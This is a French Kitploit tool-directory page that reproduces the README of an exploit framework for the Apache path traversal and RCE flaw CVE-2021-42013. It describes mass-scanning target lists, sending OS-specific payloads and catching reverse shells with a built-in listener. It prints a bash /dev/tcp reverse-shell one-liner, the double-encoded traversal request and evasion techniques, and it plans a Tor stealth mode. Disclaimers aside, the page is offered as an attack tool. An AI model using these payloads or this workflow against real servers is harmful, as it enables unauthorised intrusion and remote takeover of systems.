Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-CVE-2021-42013-EXPLOIT — Un outil avancé de scan, d'exploitation et d'interaction à distance, conçu pour détecter et exploiter la vulnérabilité Apache Path Traversal + RCE (CVE-2021-42013) sur des serveurs mal configurés. | Kitploit
Outils/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationShellcodeExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et Contrôle

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Outil d'Accès à Distance
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

Un outil avancé de scan, d'exploitation et d'interaction à distance, conçu pour détecter et exploiter la vulnérabilité Apache Path Traversal + RCE (CVE-2021-42013) sur des serveurs mal configurés.

Voir le dépôt
4il y a 1 anPas encore vérifié
Partager

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


root@kitploit:~
# 🔥 CVE-2021-42013 Exploit Framework par Makaveli

> 💀 Mode Hacker Cosmique Multidimensionnel activé...

Un outil avancé de scan, d'exploitation et d'interaction à distance conçu pour détecter et exploiter la vulnérabilité **Apache Path Traversal + RCE (CVE-2021-42013)** sur des serveurs mal configurés.

---

## ⚠️ Avertissement légal

> Ce logiciel est fourni uniquement à des fins éducatives et de recherche dans des environnements contrôlés.

L'utilisation de cet outil contre des systèmes sans autorisation expresse peut être illégale et constitue un délit dans de nombreux pays.

L'auteur décline toute responsabilité en cas d'utilisation abusive de ce code. Utilise-le à tes propres risques et uniquement avec l'autorisation explicite du propriétaire du système cible.

---

## 🧠 Description technique

Cet outil permet :

- ✅ Scanner plusieurs cibles à partir d'un fichier `.txt`.
- ✅ Détecter automatiquement la présence de CVE-2021-42013.
- ✅ Identifier le système d'exploitation distant (Linux ou Windows).
- ✅ Envoyer des payloads personnalisés selon le système détecté.
- ✅ Établir un reverse shell et obtenir un accès distant.
- ✅ Interagir avec le shell en temps réel via un listener intégré.
- ✅ Profiter de logs avancés, d'une barre de progression et d'un menu interactif.

---

## 🔧 Prérequis

- Python **3.8+**
- Systèmes basés sur Unix/Linux/MacOS (utilisation de `subprocess` et `curl`)
- Nécessite les bibliothèques Python suivantes :

```bash
pip install -r requirements.txt
```

**`requirements.txt`**

```
rich
alive-progress
```

Tu dois également avoir `curl` installé sur le système d'exploitation.

---

## 📁 Structure des fichiers

```
.
├── POC-CVE.py       # Script principal
├── logs.txt              # Fichier de logs généré automatiquement
├── requirements.txt      # Dépendances Python
└── targets.txt           # (Optionnel) Liste d'URL à scanner
```

---

## 🚀 Utilisation interactive

```bash
python3 POC-CVE.py
```

Choisis entre :

* `scan_file` : scanne plusieurs URL à partir d'un fichier et affiche lesquelles sont vulnérables.
* `exploit` : exploitation directe d'une seule cible, avec reverse shell.
* `exit` : quitter le mode interactif.

---

## 🔍 Scan massif (scan\_file)

1. Crée un fichier avec une liste d'URL, une par ligne :

```txt
http://example.com
http://victim.net
http://192.168.1.100
```

2. Lance le scan :

```bash
python3 POC-CVE.py
```

Choisis `scan_file` et fournis :

* Le chemin du fichier
* Le nombre de threads pour le scan parallèle

---

## 💥 Exploitation (exploit)

1. Choisis `exploit` dans le menu.
2. Saisis :

* L'URL de la cible
* Ton IP locale (`LHOST`) pour recevoir le shell
* Un port libre (`LPORT`) pour le listener

Le script :

* Détectera si la cible est vulnérable.
* Enverra un payload adapté selon le système d'exploitation distant.
* Ouvrira un **listener** et te fournira un accès interactif.

---

## 🧪 Exemple de payloads

### Payload Linux (Bash TCP Reverse Shell)

```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```

### Payload Windows (PowerShell TCP Reverse Shell)

```powershell
powershell -NoP -NonI -W Hidden -Command ...
```

---

## 🧠 Techniques utilisées

* Path traversal avec double encodage (`/.%252e/.%252e/.%252e`)
* Injection de commandes via `curl`
* En-têtes d'évasion (`User-Agent`, `Accept`, etc)
* Reverse shell pour la prise de contrôle à distance
* Multithreading et barre de progression (Alive Progress)
* Logging avec horodatage et Rich Console

---

## 📌 Référence CVE

* **CVE-ID** : [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Vecteur d'attaque** : `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Impact** : RCE (Remote Code Execution)
* **Score CVSS** : 9.8 (Critique)

---

## 🧙‍♂️ Auteur

* ✨ **Makaveli** — *« Hacke ta propre réalité »*

---

## 🛡️ Clause de non-responsabilité

> Ce projet est fourni « tel quel », sans garantie ni responsabilité en cas de dommages découlant de son utilisation.
> **Ne scanne et n'exploite jamais un système sans le consentement explicite de son propriétaire.**

---

## ✅ Bonnes pratiques

* Utilise ce script uniquement dans des **environnements de laboratoire** ou lors de tests autorisés.
* Assure-toi que le port défini pour le listener soit **ouvert** et **sans pare-feu**.
* Exécute-le en tant qu'utilisateur normal (pas en root), sauf si cela est strictement nécessaire.

---

## 🧩 Roadmap future (optionnelle)

* [ ] Support de payloads personnalisés
* [ ] Exportation des résultats en CSV/JSON
* [ ] Mode furtif avec rotation des en-têtes et proxy TOR
* [ ] Interface web locale (Flask)

```

---

```

---

@DonMakaveliw, es-tu prêt à créer l'avenir ?
---

<p align="center">
  <img src="https://img.shields.io/badge/License-MIT-blue.svg" />
  <img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&amp;logo=python&amp;logoColor=FFD43B" />
  <img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
  <img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
  <img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
  <img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>
Télécharger l’outil